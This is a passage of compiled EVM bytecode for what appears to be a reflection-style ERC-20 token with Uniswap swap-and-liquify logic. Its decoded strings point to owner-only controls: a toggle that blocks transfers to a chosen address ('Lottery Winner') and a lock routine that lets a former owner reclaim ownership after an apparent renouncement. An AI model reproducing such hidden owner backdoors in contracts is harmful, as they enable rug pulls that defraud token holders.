fffff1673ffffffffffffffffffffffffffffffffffffffff16146114ff576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600860008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166115be576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f4163636f756e7420697320616c7265616479206578636c75646564000000000081525060200191505060405180910390fd5b60005b6009805490508110156117bd578173ffffffffffffffffffffffffffffffffffffffff16600982815481106115f257fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156117b05760096001600980549050038154811061164e57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166009828154811061168657fe5b9060005260206000200160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600980548061177657fe5b6001900381819060005260206000200160006101000a81549073ffffffffffffffffffffffffffffffffffffffff021916905590556117bd565b80806001019150506115c1565b5050565b600061186a6117ce613363565b8461186585600660006117df613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b61336b565b6001905092915050565b60105481565b6000611884613363565b9050600860008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611929576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602c8152602001806155c9602c913960400191505060405180910390fd5b600061193483613ae2565b5050505050905061198d81600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506119e581600b54613b3e90919063ffffffff16565b600b81905550611a0083600c54613a5a90919063ffffffff16565b600c81905550505050565b611a13613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ad3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6001600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600a54831115611ba8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f416d6f756e74206d757374206265206c657373207468616e20737570706c790081525060200191505060405180910390fd5b81611bc8576000611bb884613ae2565b5050505050905080915050611bdf565b6000611bd384613ae2565b50505050915050809150505b92915050565b611bed613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611cad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600360009054906101000a900460ff1615611cc757600080fd5b6001600360006101000a81548160ff0219169083151502179055507fdccd1c7467c143e1a5b3306b29fa6d9ec4b5abc31257acd3e355edafa582abd060405160405180910390a1565b7f000000000000000000000000cb674c1b5847a0903ed4cab814ffc15264b4324981565b601460159054906101000a900460ff1681565b611d4f613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611e0f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600860008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611ecf576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f4163636f756e7420697320616c7265616479206578636c75646564000000000081525060200191505060405180910390fd5b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541115611fa357611f5f600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461139c565b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b6001600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506009819080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60125481565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561215857600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506121a3565b6121a0600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461139c565b90505b919050565b6121b0613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612270576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60155481565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6123bb613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461247b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b8060128190555050565b6060600e8054600181600116156101000203166002900480601f01602080910402602001604051908101604052809291908181526020018280546001816001161561010002031660029004801561251d5780601f106124f25761010080835404028352916020019161251d565b820191906000526020600020905b81548152906001019060200180831161250057829003601f168201915b5050505050905090565b60006125ea612534613363565b846125e585604051806060016040528060258152602001615618602591396006600061255e613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546139259092919063ffffffff16565b61336b565b6001905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461269a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806155f56023913960400191505060405180910390fd5b6002544211612711576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f436f6e7472616374206973206c6f636b656420756e74696c203720646179730081525060200191505060405180910390fd5b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b612819613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146128d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80601460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600060011515600360009054906101000a900460ff1615151415612a1a57601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156129ff576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252600e8152602001807f4c6f74746572792057696e6e657200000000000000000000000000000000000081525060200191505060405180910390fd5b612a11612a0a613363565b8484613562565b60019050612a31565b612a2c612a25613363565b8484613562565b600190505b92915050565b6000600254905090565b601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b612a6f613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612b2f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80601460156101000a81548160ff0219169083151502179055507f53726dfcaf90650aa7eb35524f4d3220f07413c8d6cb404cc8c18bf5591bc1598160405180821515815260200191505060405180910390a150565b600360009054906101000a900460ff1681565b612ba0613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612c60576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b612c8a620f4240612c7c83600a54613b8890919063ffffffff16565b613a1090919063ffffffff16565b60158190555050565b612c9b613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612d5b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600360009054906101000a900460ff16612d7457600080fd5b6000600360006101000a81548160ff0219169083151502179055507f04d5b2c2f5293a956dd0943d3212b5aa3ae1a61fc8fb77eb0777c2d03241626860405160405180910390a1565b612dc5613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612e85576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550804201600281905550600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61303d613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146130fd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b613160613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614613220576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156132a6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602681526020018061549e6026913960400191505060405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156133f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260248152602001806155a56024913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415613477576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260228152602001806154c46022913960400191505060405180910390fd5b80600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040518082815260200191505060405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156135e8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260258152602001806155806025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561366e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806154516023913960400191505060405180910390fd5b600081116136c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260298152602001806155576029913960400191505060405180910390fd5b6136cf61238a565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561373d575061370d61238a565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561379e5760155481111561379d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260288152602001806154e66028913960400191505060405180910390fd5b5b60006137a9306120bd565b905060155481106137ba5760155490505b600060165482101590508080156137dc575060148054906101000a900460ff16155b801561383457507f000000000000000000000000cb674c1b5847a0903ed4cab814ffc15264b4324973ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b801561384c5750601460159054906101000a900460ff165b1561386057601654915061385f82613c0e565b5b600060019050600760008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806139075750600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561391157600090505b61391d86868684613cee565b505050505050565b60008383111582906139d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b8381101561399757808201518184015260208101905061397c565b50505050905090810190601f1680156139c45780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b5060008385039050809150509392505050565b60008060006139f2613fff565b91509150613a098183613a1090919063ffffffff16565b9250505090565b6000613a5283836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250614290565b905092915050565b600080828401905083811015613ad8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b6000806000806000806000806000613af98a614356565b9250925092506000806000613b178d8686613b126139e5565b6143b0565b9250925092508282828888889b509b509b509b509b509b5050505050505091939550919395565b6000613b8083836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250613925565b905092915050565b600080831415613b9b5760009050613c08565b6000828402905082848281613bac57fe5b0414613c03576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602181526020018061550e6021913960400191505060405180910390fd5b809150505b92915050565b60016014806101000a81548160ff0219169083151502179055506000613c3e600283613a1090919063ffffffff16565b90506000613c558284613b3e90919063ffffffff16565b90506000479050613c6583614439565b6000613c7a8247613b3e90919063ffffffff16565b9050613c8683826146e7565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb56184828560405180848152602001838152602001828152602001935050505060405180910390a15050505060016014806101000a81548160ff02191690831515021790555050565b80613cfc57613cfb614838565b5b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015613d9f5750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15613db457613daf84848461487b565b613feb565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015613e575750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15613e6c57613e67848484614adb565b613fea565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015613f105750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15613f2557613f20848484614d3b565b613fe9565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015613fc75750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15613fdc57613fd7848484614f06565b613fe8565b613fe7848484614d3b565b5b5b5b5b80613ff957613ff86151fb565b5b50505050565b6000806000600b5490506000600a54905060005b6009805490508110156142535782600460006009848154811061403257fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054118061411957508160056000600984815481106140b157fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b1561413057600b54600a549450945050505061428c565b6141b9600460006009848154811061414457fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205484613b3e90919063ffffffff16565b925061424460056000600984815481106141cf57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205483613b3e90919063ffffffff16565b91508080600101915050614013565b5061426b600a54600b54613a1090919063ffffffff16565b82101561428357600b54600a5493509350505061428c565b81819350935050505b9091565b6000808311829061433c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156143015780820151818401526020810190506142e6565b50505050905090810190601f16801561432e5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b50600083858161434857fe5b049050809150509392505050565b6000806000806143658561520f565b9050600061437286615240565b9050600061439b8261438d858a613b3e90919063ffffffff16565b613b3e90919063ffffffff16565b90508083839550955095505050509193909250565b6000806000806143c98589613b8890919063ffffffff16565b905060006143e08689613b8890919063ffffffff16565b905060006143f78789613b8890919063ffffffff16565b90506000614420826144128587613b3e90919063ffffffff16565b613b3e90919063ffffffff16565b9050838184965096509650505050509450945094915050565b6060600267ffffffffffffffff8111801561445357600080fd5b506040519080825280602002602001820160405280156144825781602001602082028036833780820191505090505b509050308160008151811061449357fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b15801561453357600080fd5b505afa158015614547573d6000803e3d6000fd5b505050506040513d602081101561455d57600080fd5b81019080805190602001909291905050508160018151811061457b57fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506145e0307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8461336b565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b815260040180868152602001858152602001806020018473ffffffffffffffffffffffffffffffffffffffff168152602001838152602001828103825285818151815260200191508051906020019060200280838360005b838110156146a2578082015181840152602081019050614687565b505050509050019650505050505050600060405180830381600087803b1580156146cb57600080fd5b505af11580156146df573d6000803e3d6000fd5b505050505050565b614712307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8461336b565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d71982308560008061475c61238a565b426040518863ffffffff1660e01b8152600401808773ffffffffffffffffffffffffffffffffffffffff1681526020018681526020018581526020018481526020018373ffffffffffffffffffffffffffffffffffffffff16815260200182815260200196505050505050506060604051808303818588803b1580156147e157600080fd5b505af11580156147f5573d6000803e3d6000fd5b50505050506040513d606081101561480c57600080fd5b810190808051906020019092919080519060200190929190805190602001909291905050505050505050565b600060105414801561484c57506000601254145b1561485657614879565b601054601181905550601254601381905550600060108190555060006012819055505b565b60008060008060008061488d87613ae2565b9550955095509550955095506148eb87600560008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061498086600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614a1585600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614a6181615271565b614a6b8483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614aed87613ae2565b955095509550955095509550614b4b86600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614be083600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600560008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614c7585600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614cc181615271565b614ccb8483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614d4d87613ae2565b955095509550955095509550614dab86600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614e4085600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614e8c81615271565b614e968483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614f1887613ae2565b955095509550955095509550614f7687600560008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061500b86600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506150a083600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600560008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061513585600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061518181615271565b61518b8483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b601154601081905550601354601281905550565b6000615239606461522b60105485613b8890919063ffffffff16565b613a1090919063ffffffff16565b9050919050565b600061526a606461525c60125485613b8890919063ffffffff16565b613a1090919063ffffffff16565b9050919050565b600061527b6139e5565b905060006152928284613b8890919063ffffffff16565b90506152e681600460003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600860003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615615411576153cd83600560003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600560003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b61542b82600b54613b3e90919063ffffffff16565b600b8190555061544681600c54613a5a90919063ffffffff16565b600c81905550505056fe45524332303a207472616e7366657220746f20746865207a65726f2061646472657373416d6f756e74206d757374206265206c657373207468616e20746f74616c207265666c656374696f6e734f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f20616464726573735472616e7366657220616d6f756e74206578636565647320746865206d61785478416d6f756e742e536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f7745524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655472616e7366657220616d6f756e74206d757374